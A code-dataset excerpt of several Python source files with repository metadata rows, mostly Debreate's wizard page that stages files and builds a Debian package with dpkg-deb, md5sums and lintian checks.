    class Meta:
        model = NotifyStudent
        fields = ('__all__')


class PlacementStatusSerializer(serializers.ModelSerializer):
    notify_id = NotifyStudentSerializer()

    class Meta:
        model = PlacementStatus
        fields = ('notify_id', 'invitation', 'placed', 'timestamp', 'no_of_days')
| 27.376471 | 89 | 0.644607 | 200 | 2,327 | 7.215 | 0.34 | 0.198198 | 0.106722 | 0.218295 | 0.24948 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.270735 | 2,327 | 84 | 90 | 27.702381 | 0.850324 | 0 | 0 | 0.333333 | 0 | 0 | 0.072626 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.016667 | false | 0 | 0.05 | 0 | 0.483333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e69960fc13118fa865fc6b90dfac61ac3e974383 | 1,290 | py | Python | model-optimizer/extensions/front/mxnet/arange_ext.py | calvinfeng/openvino | 11f591c16852637506b1b40d083b450e56d0c8ac | [
"Apache-2.0"
] | null | null | null | model-optimizer/extensions/front/mxnet/arange_ext.py | calvinfeng/openvino | 11f591c16852637506b1b40d083b450e56d0c8ac | [
"Apache-2.0"
] | 19 | 2021-03-26T08:11:00.000Z | 2022-02-21T13:06:26.000Z | model-optimizer/extensions/front/mxnet/arange_ext.py | calvinfeng/openvino | 11f591c16852637506b1b40d083b450e56d0c8ac | [
"Apache-2.0"
] | 1 | 2021-07-28T17:30:46.000Z | 2021-07-28T17:30:46.000Z | """
Copyright (C) 2018-2021 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import numpy as np
from extensions.ops.range import Range
from mo.front.extractor import FrontExtractorOp
from mo.front.mxnet.extractors.utils import get_mxnet_layer_attrs
from mo.graph.graph import Node
class ArangeExt(FrontExtractorOp):
    op = '_arange'
    enabled = True

    @classmethod
    def extract(cls, node: Node):
        attrs = get_mxnet_layer_attrs(node.symbol_dict)
        Range.update_node_stat(node, {
            'start': attrs.int('start', 0),
            'stop': attrs.int('stop', 0),
            'repeat': attrs.int('repeat', 1),
            'step': attrs.float('step', 1),
            'dtype': np.dtype(attrs.str('dtype ', 'float32'))
        })
        return cls.enabled
| 32.25 | 73 | 0.694574 | 181 | 1,290 | 4.895028 | 0.60221 | 0.06772 | 0.029345 | 0.036117 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017699 | 0.211628 | 1,290 | 39 | 74 | 33.076923 | 0.853491 | 0.439535 | 0 | 0 | 0 | 0 | 0.089362 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0 | 0.263158 | 0 | 0.526316 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
e6a0c4454894632f570e8f7308cb8d060eed1f45 | 767 | py | Python | modtox/Helpers/helpers.py | danielSoler93/modtox | 757234140cc780f57d031b46d9293fc2bf95d18d | [
"Apache-2.0"
] | 4 | 2019-09-22T22:57:30.000Z | 2020-03-18T13:20:50.000Z | modtox/Helpers/helpers.py | danielSoler93/ModTox | 757234140cc780f57d031b46d9293fc2bf95d18d | [
"Apache-2.0"
] | 21 | 2019-09-16T11:07:13.000Z | 2019-11-20T15:06:06.000Z | modtox/Helpers/helpers.py | danielSoler93/ModTox | 757234140cc780f57d031b46d9293fc2bf95d18d | [
"Apache-2.0"
] | 2 | 2019-09-07T17:07:55.000Z | 2020-03-18T13:20:52.000Z | import os
def retrieve_molecule_number(pdb, resname):
    """
    IDENTIFICATION OF MOLECULE NUMBER BASED
    ON THE TER'S
    """
    count = 0
    with open(pdb, 'r') as x:
        lines = x.readlines()
    for i in lines:
        if i.split()[0] == 'TER': count += 1
        if i.split()[3] == resname:
            molecule_number = count + 1
            break
    return molecule_number


class cd:
    """Context manager for changing the current working directory"""

    def __init__(self, newPath):
        self.newPath = os.path.expanduser(newPath)

    def __enter__(self):
        self.savedPath = os.getcwd()
        os.chdir(self.newPath)

    def __exit__(self, etype, value, traceback):
        os.chdir(self.savedPath)
| 23.96875 | 68 | 0.573664 | 93 | 767 | 4.55914 | 0.580645 | 0.132075 | 0.037736 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009542 | 0.316819 | 767 | 31 | 69 | 24.741935 | 0.799618 | 0.148631 | 0 | 0 | 0 | 0 | 0.006319 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.210526 | false | 0 | 0.052632 | 0 | 0.368421 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1
e6a5916da8516ca978c7505bb56075d47bacaa77 | 826 | py | Python | tools/webcam/webcam_apis/nodes/__init__.py | ivmtorres/mmpose | 662cb50c639653ae2fc19d3421ce10bd02246b85 | [
"Apache-2.0"
] | 1 | 2022-02-13T12:27:40.000Z | 2022-02-13T12:27:40.000Z | tools/webcam/webcam_apis/nodes/__init__.py | ivmtorres/mmpose | 662cb50c639653ae2fc19d3421ce10bd02246b85 | [
"Apache-2.0"
] | null | null | null | tools/webcam/webcam_apis/nodes/__init__.py | ivmtorres/mmpose | 662cb50c639653ae2fc19d3421ce10bd02246b85 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) OpenMMLab. All rights reserved.
from .builder import NODES
from .faceswap_nodes import FaceSwapNode
from .frame_effect_nodes import (BackgroundNode, BugEyeNode, MoustacheNode,
NoticeBoardNode, PoseVisualizerNode,
SaiyanNode, SunglassesNode)
from .helper_nodes import ModelResultBindingNode, MonitorNode, RecorderNode
from .mmdet_nodes import DetectorNode
from .mmpose_nodes import TopDownPoseEstimatorNode
from .xdwendwen_nodes import XDwenDwenNode
__all__ = [
    'NODES', 'PoseVisualizerNode', 'DetectorNode', 'TopDownPoseEstimatorNode',
    'MonitorNode', 'BugEyeNode', 'SunglassesNode', 'ModelResultBindingNode',
    'NoticeBoardNode', 'RecorderNode', 'FaceSwapNode', 'MoustacheNode',
    'SaiyanNode', 'BackgroundNode', 'XDwenDwenNode'
]
| 45.888889 | 78 | 0.74092 | 65 | 826 | 9.246154 | 0.476923 | 0.109817 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.175545 | 826 | 17 | 79 | 48.588235 | 0.882526 | 0.054479 | 0 | 0 | 0 | 0 | 0.263158 | 0.05905 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.466667 | 0 | 0.466667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
e6aa6635d278553660a8a5b50b4098367fae31a5 | 2,446 | py | Python | composer/profiler/__init__.py | stanford-crfm/composer | 4996fbd818971afd6439961df58b531d9b47a37b | [
"Apache-2.0"
] | null | null | null | composer/profiler/__init__.py | stanford-crfm/composer | 4996fbd818971afd6439961df58b531d9b47a37b | [
"Apache-2.0"
] | null | null | null | composer/profiler/__init__.py | stanford-crfm/composer | 4996fbd818971afd6439961df58b531d9b47a37b | [
"Apache-2.0"
] | null | null | null | # Copyright 2021 MosaicML. All Rights Reserved.
"""Performance profiling tools.
The profiler gathers performance metrics during a training run that can be used to diagnose bottlenecks and
facilitate model development.
The metrics gathered include:
* Duration of each :class:`.Event` during training
* Time taken by the data loader to return a batch
* Host metrics such as CPU, system memory, disk and network utilization over time
* Execution order, latency and attributes of PyTorch operators and GPU kernels (see :doc:`profiler`)
The following example demonstrates how to setup and perform profiling on a simple training run.
.. literalinclude:: ../../../examples/profiler_demo.py
    :language: python
    :linenos:
    :emphasize-lines: 6, 27-49
It is required to specify an output ``profiler_trace_file`` during :class:`.Trainer` initialization to enable profiling.
The ``profiler_trace_file`` will contain the profiling trace data once the profiling run completes. By default, the :class:`.Profiler`,
:class:`.DataloaderProfiler` and :class:`.SystemProfiler` will be active. The :class:`.TorchProfiler` is **disabled** by default.
To activate the :class:`.TorchProfiler`, the ``torch_profiler_trace_dir`` must be specified *in addition* to the ``profiler_trace_file`` argument.
The ``torch_profiler_trace_dir`` will contain the Torch Profiler traces once the profiling run completes. The :class:`.Profiler` will
automatically merge the Torch traces in the ``torch_profiler_trace_dir`` into the ``profiler_trace_file``, allowing users to view a unified trace.
The complete traces can be viewed by in a Google Chrome browser navigating to ``chrome://tracing`` and loading the ``profiler_trace_file``.
Here is an example trace file:
.. image:: https://storage.googleapis.com/docs.mosaicml.com/images/profiler/profiler_trace_example.png
    :alt: Example Profiler Trace File
    :align: center
Additional details can be found in the Profiler Guide.
"""
from composer.profiler._event_handler import ProfilerEventHandler
from composer.profiler._profiler import Marker, Profiler
from composer.profiler._profiler_action import ProfilerAction
# All needs to be defined properly for sphinx autosummary
__all__ = [
    "Marker",
    "Profiler",
    "ProfilerAction",
    "ProfilerEventHandler",
]
Marker.__module__ = __name__
Profiler.__module__ = __name__
ProfilerAction.__module__ = __name__
ProfilerEventHandler.__module__ = __name__
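# The __module__ reassignments above make the re-exported classes appear to
# originate from the public package, so Sphinx autosummary documents them
# under composer.profiler rather than the private submodules. The pattern in
# isolation, with illustrative names ('mypkg' stands in for the package):
class Marker:  # imagine this was defined in a private submodule mypkg._impl
    pass

Marker.__module__ = 'mypkg'  # re-attribute it to the public package name
print(Marker.__module__)  # mypkg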
# File: wizbin/build.py (repo: RogueScholar/debreate, license: MIT)
# -*- coding: utf-8 -*-
## \package wizbin.build
# MIT licensing
# See: docs/LICENSE.txt
import commands, os, shutil, subprocess, traceback, wx
from dbr.functions import FileUnstripped
from dbr.language import GT
from dbr.log import DebugEnabled
from dbr.log import Logger
from dbr.md5 import WriteMD5
from fileio.fileio import ReadFile
from fileio.fileio import WriteFile
from globals.bitmaps import ICON_EXCLAMATION
from globals.bitmaps import ICON_INFORMATION
from globals.errorcodes import dbrerrno
from globals.execute import ExecuteCommand
from globals.execute import GetExecutable
from globals.execute import GetSystemInstaller
from globals.ident import btnid
from globals.ident import chkid
from globals.ident import inputid
from globals.ident import pgid
from globals.paths import ConcatPaths
from globals.paths import PATH_app
from globals.strings import GS
from globals.strings import RemoveEmptyLines
from globals.strings import TextIsEmpty
from globals.system import PY_VER_MAJ
from globals.tooltips import SetPageToolTips
from input.toggle import CheckBox
from input.toggle import CheckBoxESS
from startup.tests import UsingTest
from ui.button import CreateButton
from ui.checklist import CheckListDialog
from ui.dialog import DetailedMessageDialog
from ui.dialog import ShowErrorDialog
from ui.layout import BoxSizer
from ui.output import OutputLog
from ui.panel import BorderedPanel
from ui.progress import PD_DEFAULT_STYLE
from ui.progress import ProgressDialog
from ui.progress import TimedProgressDialog
from ui.style import layout as lyt
from wiz.helper import FieldEnabled
from wiz.helper import GetField
from wiz.helper import GetMainWindow
from wiz.helper import GetPage
from wiz.wizard import WizardPage
## Build page
class Page(WizardPage):
## Constructor
#
# \param parent
# Parent <b><i>wx.Window</i></b> instance
def __init__(self, parent):
WizardPage.__init__(self, parent, pgid.BUILD)
# ----- Extra Options
pnl_options = BorderedPanel(self)
self.chk_md5 = CheckBoxESS(pnl_options, chkid.MD5, GT(u'Create md5sums file'),
name=u'MD5', defaultValue=True, commands=u'md5sum')
# The » character denotes that an alternate tooltip should be shown if the control is disabled
self.chk_md5.tt_name = u'md5»'
self.chk_md5.col = 0
# Option to strip binaries
self.chk_strip = CheckBoxESS(pnl_options, chkid.STRIP, GT(u'Strip binaries'),
name=u'strip»', defaultValue=True, commands=u'strip')
self.chk_strip.col = 0
# Deletes the temporary build tree
self.chk_rmstage = CheckBoxESS(pnl_options, chkid.DELETE, GT(u'Delete staged directory'),
name=u'RMSTAGE', defaultValue=True)
self.chk_rmstage.col = 0
# Checks the output .deb for errors
self.chk_lint = CheckBoxESS(pnl_options, chkid.LINT, GT(u'Check package for errors with lintian'),
name=u'LINTIAN', defaultValue=True, commands=u'lintian')
self.chk_lint.tt_name = u'lintian»'
self.chk_lint.col = 0
# Installs the deb on the system
self.chk_install = CheckBox(pnl_options, chkid.INSTALL, GT(u'Install package after build'),
name=u'INSTALL', commands=(u'gdebi-gtk', u'gdebi-kde',))
self.chk_install.tt_name = u'install»'
self.chk_install.col = 0
# *** Lintian Overrides *** #
if UsingTest(u'alpha'):
# FIXME: Move next to lintian check box
Logger.Info(__name__, u'Enabling alpha feature "lintian overrides" option')
self.lint_overrides = []
btn_lint_overrides = CreateButton(self, label=GT(u'Lintian overrides'))
btn_lint_overrides.Bind(wx.EVT_BUTTON, self.OnSetLintOverrides)
btn_build = CreateButton(self, btnid.BUILD, GT(u'Build'), u'build', 64)
# Display log
dsp_log = OutputLog(self)
SetPageToolTips(self)
# *** Event Handling *** #
btn_build.Bind(wx.EVT_BUTTON, self.OnBuild)
# *** Layout *** #
lyt_options = wx.GridBagSizer()
next_row = 0
prev_row = next_row
for CHK in pnl_options.Children:
row = next_row
FLAGS = lyt.PAD_LR
if CHK.col:
row = prev_row
FLAGS = wx.RIGHT
lyt_options.Add(CHK, (row, CHK.col), flag=FLAGS, border=5)
if not CHK.col:
prev_row = next_row
next_row += 1
pnl_options.SetSizer(lyt_options)
pnl_options.SetAutoLayout(True)
pnl_options.Layout()
lyt_buttons = BoxSizer(wx.HORIZONTAL)
lyt_buttons.Add(btn_build, 1)
lyt_main = BoxSizer(wx.VERTICAL)
lyt_main.AddSpacer(10)
lyt_main.Add(wx.StaticText(self, label=GT(u'Extra Options')), 0,
lyt.ALGN_LB|wx.LEFT, 5)
lyt_main.Add(pnl_options, 0, wx.LEFT, 5)
lyt_main.AddSpacer(5)
if UsingTest(u'alpha'):
#lyt_main.Add(wx.StaticText(self, label=GT(u'Lintian overrides')), 0, wx.LEFT, 5)
lyt_main.Add(btn_lint_overrides, 0, wx.LEFT, 5)
lyt_main.AddSpacer(5)
lyt_main.Add(lyt_buttons, 0, lyt.ALGN_C)
lyt_main.Add(dsp_log, 2, wx.EXPAND|lyt.PAD_LRB, 5)
self.SetAutoLayout(True)
self.SetSizer(lyt_main)
self.Layout()
## Method that builds the actual Debian package
#
# \param task_list
# \b \e dict : Task string IDs & page data
# \param build_path
# \b \e unicode|str : Directory where .deb will be output
# \param filename
# \b \e unicode|str : Basename of output file without .deb extension
# \return
# \b \e dbrerror : SUCCESS if build completed successfully
def Build(self, task_list, build_path, filename):
# Declare this here in case of error before progress dialog created
build_progress = None
try:
# Other mandatory tasks that will be processed
mandatory_tasks = (
u'stage',
u'install_size',
u'control',
u'build',
)
# Add other mandatory tasks
for T in mandatory_tasks:
task_list[T] = None
task_count = len(task_list)
# Add each file for updating progress dialog
if u'files' in task_list:
task_count += len(task_list[u'files'])
# Add each script for updating progress dialog
if u'scripts' in task_list:
task_count += len(task_list[u'scripts'])
if DebugEnabled():
task_msg = GT(u'Total tasks: {}').format(task_count)
print(u'DEBUG: [{}] {}'.format(__name__, task_msg))
for T in task_list:
print(u'\t{}'.format(T))
create_changelog = u'changelog' in task_list
create_copyright = u'copyright' in task_list
pg_control = GetPage(pgid.CONTROL)
pg_menu = GetPage(pgid.MENU)
stage_dir = u'{}/{}__dbp__'.format(build_path, filename)
if os.path.isdir(u'{}/DEBIAN'.format(stage_dir)):
try:
shutil.rmtree(stage_dir)
except OSError:
ShowErrorDialog(GT(u'Could not free stage directory: {}').format(stage_dir),
title=GT(u'Cannot Continue'))
return (dbrerrno.EEXIST, None)
# Actual path to new .deb
deb = u'"{}/{}.deb"'.format(build_path, filename)
progress = 0
task_msg = GT(u'Preparing build tree')
Logger.Debug(__name__, task_msg)
wx.Yield()
build_progress = ProgressDialog(GetMainWindow(), GT(u'Building'), task_msg,
maximum=task_count,
style=PD_DEFAULT_STYLE|wx.PD_ELAPSED_TIME|wx.PD_ESTIMATED_TIME|wx.PD_CAN_ABORT)
DIR_debian = ConcatPaths((stage_dir, u'DEBIAN'))
# Make a fresh build tree
os.makedirs(DIR_debian)
progress += 1
if build_progress.WasCancelled():
build_progress.Destroy()
return (dbrerrno.ECNCLD, None)
def UpdateProgress(current_task, message=None):
task_eval = u'{} / {}'.format(current_task, task_count)
if message:
Logger.Debug(__name__, u'{} ({})'.format(message, task_eval))
wx.Yield()
build_progress.Update(current_task, message)
return
wx.Yield()
build_progress.Update(current_task)
# *** Files *** #
if u'files' in task_list:
UpdateProgress(progress, GT(u'Copying files'))
no_follow_link = GetField(GetPage(pgid.FILES), chkid.SYMLINK).IsChecked()
# TODO: move this into a file functions module
def _copy(f_src, f_tgt, exe=False):
# NOTE: Python 3 appears to have follow_symlinks option for shutil.copy
# FIXME: copying nested symbolic link may not work
if os.path.isdir(f_src):
if os.path.islink(f_src) and no_follow_link:
Logger.Debug(__name__, u'Adding directory symbolic link to stage: {}'.format(f_tgt))
os.symlink(os.readlink(f_src), f_tgt)
else:
Logger.Debug(__name__, u'Adding directory to stage: {}'.format(f_tgt))
shutil.copytree(f_src, f_tgt)
os.chmod(f_tgt, 0o0755)
elif os.path.isfile(f_src):
if os.path.islink(f_src) and no_follow_link:
Logger.Debug(__name__, u'Adding file symbolic link to stage: {}'.format(f_tgt))
os.symlink(os.readlink(f_src), f_tgt)
else:
if exe:
Logger.Debug(__name__, u'Adding executable to stage: {}'.format(f_tgt))
else:
Logger.Debug(__name__, u'Adding file to stage: {}'.format(f_tgt))
shutil.copy(f_src, f_tgt)
# Set FILE permissions
if exe:
os.chmod(f_tgt, 0o0755)
else:
os.chmod(f_tgt, 0o0644)
files_data = task_list[u'files']
for FILE in files_data:
# Each entry is formatted as: "<source path> -> <target filename> -> <target directory>"
file_defs = FILE.split(u' -> ')
source_file = file_defs[0]
target_file = u'{}{}/{}'.format(stage_dir, file_defs[2], file_defs[1])
target_dir = os.path.dirname(target_file)
if not os.path.isdir(target_dir):
os.makedirs(target_dir)
# Remove asterisks from executables
exe = False
if source_file[-1] == u'*':
exe = True
source_file = source_file[:-1]
_copy(source_file, u'{}/{}'.format(target_dir, os.path.basename(source_file)), exe)
# Individual files
progress += 1
UpdateProgress(progress)
# Entire file task
progress += 1
if build_progress.WasCancelled():
build_progress.Destroy()
return (dbrerrno.ECNCLD, None)
# *** Strip files ***#
# FIXME: Needs only be run if 'files' step is used
if u'strip' in task_list:
UpdateProgress(progress, GT(u'Stripping binaries'))
for ROOT, DIRS, FILES in os.walk(stage_dir): #@UnusedVariable
for F in FILES:
# Don't check files in DEBIAN directory
if ROOT != DIR_debian:
F = ConcatPaths((ROOT, F))
if FileUnstripped(F):
Logger.Debug(__name__, u'Unstripped file: {}'.format(F))
# FIXME: Strip command should be set as class member?
ExecuteCommand(GetExecutable(u'strip'), F)
progress += 1
if build_progress.WasCancelled():
build_progress.Destroy()
return (dbrerrno.ECNCLD, None)
package = GetField(pg_control, inputid.PACKAGE).GetValue()
# Make sure that the directory is available in which to place documentation
if create_changelog or create_copyright:
doc_dir = u'{}/usr/share/doc/{}'.format(stage_dir, package)
if not os.path.isdir(doc_dir):
os.makedirs(doc_dir)
# *** Changelog *** #
if create_changelog:
UpdateProgress(progress, GT(u'Creating changelog'))
# If changelog will be installed to default directory
changelog_target = task_list[u'changelog'][0]
if changelog_target == u'STANDARD':
changelog_target = ConcatPaths((u'{}/usr/share/doc'.format(stage_dir), package))
else:
changelog_target = ConcatPaths((stage_dir, changelog_target))
if not os.path.isdir(changelog_target):
os.makedirs(changelog_target)
WriteFile(u'{}/changelog'.format(changelog_target), task_list[u'changelog'][1])
CMD_gzip = GetExecutable(u'gzip')
if CMD_gzip:
UpdateProgress(progress, GT(u'Compressing changelog'))
c = u'{} -n --best "{}/changelog"'.format(CMD_gzip, changelog_target)
clog_status = commands.getstatusoutput(c.encode(u'utf-8'))
if clog_status[0]:
ShowErrorDialog(GT(u'Could not compress changelog'), clog_status[1], warn=True, title=GT(u'Warning'))
progress += 1
if build_progress.WasCancelled():
build_progress.Destroy()
return (dbrerrno.ECNCLD, None)
# *** Copyright *** #
if create_copyright:
UpdateProgress(progress, GT(u'Creating copyright'))
WriteFile(u'{}/usr/share/doc/{}/copyright'.format(stage_dir, package), task_list[u'copyright'])
progress += 1
if build_progress.WasCancelled():
build_progress.Destroy()
return (dbrerrno.ECNCLD, None)
# Characters that should not be in filenames
invalid_chars = (u' ', u'/')
# *** Menu launcher *** #
if u'launcher' in task_list:
UpdateProgress(progress, GT(u'Creating menu launcher'))
# This might be changed later to set a custom directory
menu_dir = u'{}/usr/share/applications'.format(stage_dir)
menu_filename = pg_menu.GetOutputFilename()
# Remove invalid characters from filename
for char in invalid_chars:
menu_filename = menu_filename.replace(char, u'_')
if not os.path.isdir(menu_dir):
os.makedirs(menu_dir)
WriteFile(u'{}/{}.desktop'.format(menu_dir, menu_filename), task_list[u'launcher'])
progress += 1
if build_progress.WasCancelled():
build_progress.Destroy()
return (dbrerrno.ECNCLD, None)
# *** md5sums file *** #
# Good practice to create hashes before populating DEBIAN directory
if u'md5sums' in task_list:
UpdateProgress(progress, GT(u'Creating md5sums'))
if not WriteMD5(stage_dir, parent=build_progress):
# Couldn't call md5sum command
build_progress.Cancel()
progress += 1
if build_progress.WasCancelled():
build_progress.Destroy()
return (dbrerrno.ECNCLD, None)
# *** Scripts *** #
if u'scripts' in task_list:
UpdateProgress(progress, GT(u'Creating scripts'))
scripts = task_list[u'scripts']
for SCRIPT in scripts:
script_name = SCRIPT
script_text = scripts[SCRIPT]
script_filename = ConcatPaths((stage_dir, u'DEBIAN', script_name))
WriteFile(script_filename, script_text)
# Make sure script path is wrapped in quotes to avoid whitespace errors
os.chmod(script_filename, 0o0755)
os.system((u'chmod +x "{}"'.format(script_filename)))
# Individual scripts
progress += 1
UpdateProgress(progress)
# Entire script task
progress += 1
if build_progress.WasCancelled():
build_progress.Destroy()
return (dbrerrno.ECNCLD, None)
# *** Control file *** #
UpdateProgress(progress, GT(u'Getting installed size'))
# Get installed-size
installed_size = os.popen((u'du -hsk "{}"'.format(stage_dir))).readlines()
installed_size = installed_size[0].split(u'\t')
installed_size = installed_size[0]
# Insert Installed-Size into control file
control_data = pg_control.Get().split(u'\n')
control_data.insert(2, u'Installed-Size: {}'.format(installed_size))
progress += 1
if build_progress.WasCancelled():
build_progress.Destroy()
return (dbrerrno.ECNCLD, None)
# Create final control file
UpdateProgress(progress, GT(u'Creating control file'))
# dpkg fails if there is no newline at end of file
control_data = u'\n'.join(control_data).strip(u'\n')
# Ensure there is only one empty trailing newline
# Two '\n' to show physical empty line, but not required
# Perhaps because string is not null terminated???
control_data = u'{}\n\n'.format(control_data)
WriteFile(u'{}/DEBIAN/control'.format(stage_dir), control_data, noStrip=u'\n')
progress += 1
if build_progress.WasCancelled():
build_progress.Destroy()
return (dbrerrno.ECNCLD, None)
# *** Final build *** #
UpdateProgress(progress, GT(u'Running dpkg'))
working_dir = os.path.split(stage_dir)[0]
c_tree = os.path.split(stage_dir)[1]
deb_package = u'{}.deb'.format(filename)
# Change the working directory because dpkg seems to have problems with spaces in the path
os.chdir(working_dir)
# HACK to fix file/dir permissions
for ROOT, DIRS, FILES in os.walk(stage_dir):
for D in DIRS:
D = u'{}/{}'.format(ROOT, D)
os.chmod(D, 0o0755)
for F in FILES:
F = u'{}/{}'.format(ROOT, F)
if os.access(F, os.X_OK):
os.chmod(F, 0o0755)
else:
os.chmod(F, 0o0644)
# FIXME: Should check for working fakeroot & dpkg-deb executables
build_status = commands.getstatusoutput((u'{} {} -b "{}" "{}"'.format(GetExecutable(u'fakeroot'), GetExecutable(u'dpkg-deb'), c_tree, deb_package)))
progress += 1
if build_progress.WasCancelled():
build_progress.Destroy()
return (dbrerrno.ECNCLD, None)
# *** Delete staged directory *** #
if u'rmstage' in task_list:
UpdateProgress(progress, GT(u'Removing temp directory'))
try:
shutil.rmtree(stage_dir)
except OSError:
ShowErrorDialog(GT(u'An error occurred when trying to delete the build tree'),
parent=build_progress)
progress += 1
if build_progress.WasCancelled():
build_progress.Destroy()
return (dbrerrno.ECNCLD, None)
# *** ERROR CHECK
if u'lintian' in task_list:
UpdateProgress(progress, GT(u'Checking package for errors'))
# FIXME: Should be set as class member?
CMD_lintian = GetExecutable(u'lintian')
errors = commands.getoutput((u'{} {}'.format(CMD_lintian, deb)))
if errors != wx.EmptyString:
e1 = GT(u'Lintian found some issues with the package.')
e2 = GT(u'Details saved to {}').format(filename)
WriteFile(u'{}/{}.lintian'.format(build_path, filename), errors)
DetailedMessageDialog(build_progress, GT(u'Lintian Errors'),
ICON_INFORMATION, u'{}\n{}.lintian'.format(e1, e2), errors).ShowModal()
progress += 1
# Close progress dialog
wx.Yield()
build_progress.Update(progress)
build_progress.Destroy()
# Build completed successfully
if not build_status[0]:
return (dbrerrno.SUCCESS, deb_package)
if PY_VER_MAJ <= 2:
# Unicode decoder has trouble with certain characters. Replace any
# non-decodable characters with � (0xFFFD).
build_output = list(build_status[1])
# String & unicode string incompatibilities
index = 0
for C in build_output:
try:
GS(C)
except UnicodeDecodeError:
build_output[index] = u'�'
index += 1
build_status = (build_status[0], u''.join(build_output))
# Build failed
return (build_status[0], build_status[1])
except:
if build_progress:
build_progress.Destroy()
return(dbrerrno.EUNKNOWN, traceback.format_exc())
## TODO: Doxygen
#
# \return
# \b \e tuple containing Return code & build details
def BuildPrep(self):
# Declare these here in case of error before dialogs created
save_dia = None
prebuild_progress = None
try:
# List of tasks for build process
# 'stage' should be very first task
task_list = {}
# Control page
pg_control = GetPage(pgid.CONTROL)
fld_package = GetField(pg_control, inputid.PACKAGE)
fld_version = GetField(pg_control, inputid.VERSION)
fld_maint = GetField(pg_control, inputid.MAINTAINER)
fld_email = GetField(pg_control, inputid.EMAIL)
fields_control = (
fld_package,
fld_version,
fld_maint,
fld_email,
)
# Menu launcher page
pg_launcher = GetPage(pgid.MENU)
# Check to make sure that all required fields have values
required = list(fields_control)
if pg_launcher.IsOkay():
task_list[u'launcher'] = pg_launcher.Get()
required.append(GetField(pg_launcher, inputid.NAME))
if not GetField(pg_launcher, chkid.FNAME).GetValue():
required.append(GetField(pg_launcher, inputid.FNAME))
for item in required:
if TextIsEmpty(item.GetValue()):
field_name = GT(item.GetName().title())
page_name = pg_control.GetName()
if item not in fields_control:
page_name = pg_launcher.GetName()
return (dbrerrno.FEMPTY, u'{} ➜ {}'.format(page_name, field_name))
# Get information from control page for default filename
package = fld_package.GetValue()
# Remove whitespace
package = package.strip(u' \t')
package = u'-'.join(package.split(u' '))
version = fld_version.GetValue()
# Remove whitespace
version = version.strip(u' \t')
version = u''.join(version.split())
arch = GetField(pg_control, inputid.ARCH).GetStringSelection()
# Dialog for save destination
ttype = GT(u'Debian packages')
save_dia = wx.FileDialog(self, GT(u'Save'), os.getcwd(), wx.EmptyString, u'{}|*.deb'.format(ttype),
wx.FD_SAVE|wx.FD_OVERWRITE_PROMPT|wx.FD_CHANGE_DIR)
save_dia.SetFilename(u'{}_{}_{}.deb'.format(package, version, arch))
if not save_dia.ShowModal() == wx.ID_OK:
return (dbrerrno.ECNCLD, None)
build_path = os.path.split(save_dia.GetPath())[0]
filename = os.path.split(save_dia.GetPath())[1].split(u'.deb')[0]
# Control, menu, & build pages not added to this list
page_checks = (
(pgid.FILES, u'files'),
(pgid.SCRIPTS, u'scripts'),
(pgid.CHANGELOG, u'changelog'),
(pgid.COPYRIGHT, u'copyright'),
)
# Install step is not added to this list
# 'control' should be after 'md5sums'
# 'build' should be after 'control'
other_checks = (
(self.chk_md5, u'md5sums'),
(self.chk_strip, u'strip'),
(self.chk_rmstage, u'rmstage'),
(self.chk_lint, u'lintian'),
)
prep_task_count = len(page_checks) + len(other_checks)
progress = 0
wx.Yield()
prebuild_progress = ProgressDialog(GetMainWindow(), GT(u'Preparing to build'),
maximum=prep_task_count)
if wx.MAJOR_VERSION < 3:
# Resize dialog for better fit
pb_size = prebuild_progress.GetSizeTuple()
pb_size = (pb_size[0]+200, pb_size[1])
prebuild_progress.SetSize(pb_size)
prebuild_progress.CenterOnParent()
for PID, id_string in page_checks:
wx.Yield()
prebuild_progress.Update(progress, GT(u'Checking {}').format(id_string))
wizard_page = GetPage(PID)
if wizard_page.IsOkay():
task_list[id_string] = wizard_page.Get()
progress += 1
for task_check, id_string in other_checks:
wx.Yield()
prebuild_progress.Update(progress, GT(u'Testing for: {}').format(task_check.GetLabel()))
if task_check.GetValue():
task_list[id_string] = None
progress += 1
# Close progress dialog
wx.Yield()
prebuild_progress.Update(progress)
prebuild_progress.Destroy()
return (dbrerrno.SUCCESS, (task_list, build_path, filename))
except:
if save_dia:
save_dia.Destroy()
if prebuild_progress:
prebuild_progress.Destroy()
return (dbrerrno.EUNKNOWN, traceback.format_exc())
## TODO: Doxygen
